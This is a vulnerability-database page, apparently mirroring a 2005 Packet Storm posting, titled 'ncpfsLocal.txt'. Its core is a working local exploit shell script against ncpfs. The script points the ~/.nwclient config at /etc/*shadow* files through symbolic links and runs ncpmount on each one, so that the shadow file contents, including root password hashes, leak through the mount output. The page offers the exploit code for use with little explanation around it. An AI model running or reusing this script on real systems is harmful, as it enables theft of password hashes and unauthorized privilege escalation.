Lucene search

K

ncpfsLocal.txt

๐Ÿ—“๏ธย 01 Feb 2005ย 00:00:00Reported byย superTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 21ย Views

Script mounts and exploits shadow files, manipulating symbolic links for unauthorized access.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/bin/sh  
(echo 'head1 by super'  
echo -e '==============\n'  
(function head1(){  
(local -r MNTDIR=~/mnt.$$  
(mv ~/.nwclient ~/.nwclient.temp  
ln -sf $1 ~/.nwclient  
mkdir $MNTDIR)2>/dev/null  
(echo $1  
ncpmount $MNTDIR  
echo)  
(rmdir $MNTDIR  
rm ~/.nwclient  
mv .nwclient.temp .nwclient)2>/dev/null)}  
(for i in /etc/*shadow*  
do head1 $i  
done)))#  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Feb 2005 00:00Current
7.4High risk
Vulners AI Score7.4
21
.json
Report